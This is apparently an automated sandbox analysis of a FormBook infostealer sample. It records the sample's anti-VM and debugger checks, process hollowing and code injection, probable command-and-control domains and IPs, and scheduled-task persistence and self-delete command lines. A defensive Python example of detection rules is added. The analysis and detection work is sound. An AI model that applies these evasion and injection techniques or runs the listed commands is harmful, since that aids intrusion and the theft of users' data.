          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000007.00000000.280424051.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000007.00000000.259302973.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000007.00000000.259457359.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000007.00000000.250866247.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000007.00000000.264627879.00000000089F9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000007.00000000.313443511.0000000008815000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&X
          Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeCode function: 6_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\tgamf4XuLa.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05089100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05158D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0510A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05093D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05103540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05082D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_051051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_051069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05138DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_051141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05154015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05107016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05141C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0515740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05106C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0511C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05151074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05142073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05089080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05103884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050C90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0511B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0511B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05158CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05106CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_051414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0511FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0514131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0515070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05084F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05158B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05158F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05107794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05091B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0513D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05098794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0514138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05155BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_051053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05098A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0508E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0513FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05114257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05089240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05097E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0513B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05158A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0511FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05150EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_051046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0509AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_05158ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_0513FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe Code function: 20_2_050B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe Code function: 6_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\tgamf4XuLa.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exe Domain query: www.tjandamber.com
          Source: C:\Windows\explorer.exe Domain query: www.fraktal.media
          Source: C:\Windows\explorer.exe Domain query: www.expertexceleratorchallenge.com
          Source: C:\Windows\explorer.exe Network Connect: 52.25.92.0 80
          Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exe Domain query: www.d0berman245.xyz
          Source: C:\Windows\explorer.exe Domain query: www.cherrybunk.life
          Source: C:\Windows\explorer.exe Domain query: www.hellocharmaine.com
          Source: C:\Windows\explorer.exe Domain query: www.syzhtr.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 99.83.154.118 80
          Source: C:\Windows\explorer.exe Network Connect: 103.72.144.19 80
Sample uses process hollowing technique (the original image of the suspended control.exe is unmapped at its base, 0xE60000, before the payload is written in its place)
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Section unmapped: C:\Windows\SysWOW64\control.exe base address: E60000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process (4D5A is the MZ signature: a complete PE image is written into the second tgamf4XuLa.exe instance at 0x400000)
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Memory written: C:\Users\user\Desktop\tgamf4XuLa.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\control.exe; Thread register set: target process: 3388
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp' (persistence: the task is created from an XML definition dropped to %TEMP%, and its name matches the dropped C:\Users\user\AppData\Roaming\HpnpObXJP.exe)
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe (the loader re-launches itself; the child is the copy that receives the injected PE)
Source: C:\Windows\SysWOW64\control.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe' (the dropper is deleted from the hollowed control.exe once the payload runs elsewhere)
Source: explorer.exe, 00000007.00000000.277193116.0000000001398000.00000004.00000020.sdmp; Binary or memory string: ProgmanamF
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp; Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Queries volume information: C:\Users\user\Desktop\tgamf4XuLa.exe VolumeInformation
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
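The three "Process created" lines in this section (schtasks /Create fed an XML from %TEMP%, the sample re-launching itself, and control.exe removing the dropper through cmd /c del) translate directly into host detection logic. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it runs three rules over constructed Sysmon-style process-creation records. The first three records mirror the command lines reported above; the notepad.exe record, the svchost.exe-spawned schtasks record, the rule names and the ProcEvent field names are the example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record with Sysmon Event ID 1 style fields (assumed layout)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _under_windows(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")


def _norm(command_line: str) -> str:
    # Drop both quote styles so one regex covers 'quoted' and "quoted" paths.
    return command_line.replace("'", "").replace('"', "").lower()


def rule_self_spawn(ev: ProcEvent) -> bool:
    """A user-path executable launching a second copy of itself.

    The .NET loader stage of this sample does that before injecting the PE
    into the child; system binaries spawning themselves are excluded."""
    return ev.image.lower() == ev.parent_image.lower() and not _under_windows(ev.image)


_TEMP_XML = re.compile(r"/xml\s+\S*\\appdata\\local\\temp\\")


def rule_schtasks_temp_xml(ev: ProcEvent) -> bool:
    """schtasks /Create fed a task definition XML that lives in %TEMP%."""
    cl = _norm(ev.command_line)
    return (_basename(ev.image) == "schtasks.exe"
            and "/create" in cl
            and _TEMP_XML.search(cl) is not None)


_DEL_USER_EXE = re.compile(r"/c\s+del\s+c:\\users\\\S+\.exe\b")


def rule_self_delete(ev: ProcEvent) -> bool:
    """cmd /c del of an executable under C:\\Users, spawned by a Windows system
    binary: the hollowed control.exe removing the original dropper."""
    return (_basename(ev.image) == "cmd.exe"
            and _under_windows(ev.parent_image)
            and _DEL_USER_EXE.search(_norm(ev.command_line)) is not None)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("self_spawn", rule_self_spawn),
    ("schtasks_temp_xml", rule_schtasks_temp_xml),
    ("self_delete", rule_self_delete),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every rule that fires on every event."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev.command_line))
    return hits


# Constructed records. The first three mirror the report's "Process created"
# lines; the last two are benign filler to show the rules stay quiet on them.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\tgamf4XuLa.exe", r"C:\Windows\SysWOW64\schtasks.exe",
              r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'"),
    ProcEvent(r"C:\Users\user\Desktop\tgamf4XuLa.exe", r"C:\Users\user\Desktop\tgamf4XuLa.exe",
              r"C:\Users\user\Desktop\tgamf4XuLa.exe"),
    ProcEvent(r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r"cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /Create /TN Backup /SC DAILY /TR C:\Tools\backup.cmd"),
]

if __name__ == "__main__":
    for name, cl in evaluate(SAMPLE_EVENTS):
        print(f"{name}: {cl}")
```

Each rule is deliberately narrow: the schtasks rule keys on the XML living under AppData\Local\Temp rather than on the task name, because the name (Updates\HpnpObXJP) is randomised per build, and the self-delete rule requires a system-binary parent so that ordinary uninstallers deleting their own files do not fire it.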

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match; File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Technique names followed by digits were matched in this analysis; the digits are the report's own count markers. The remaining entries are the unmatched techniques of each tactic column.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Scheduled Task/Job 1; Shared Modules 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Scheduled Task/Job 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection 612; Scheduled Task/Job 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
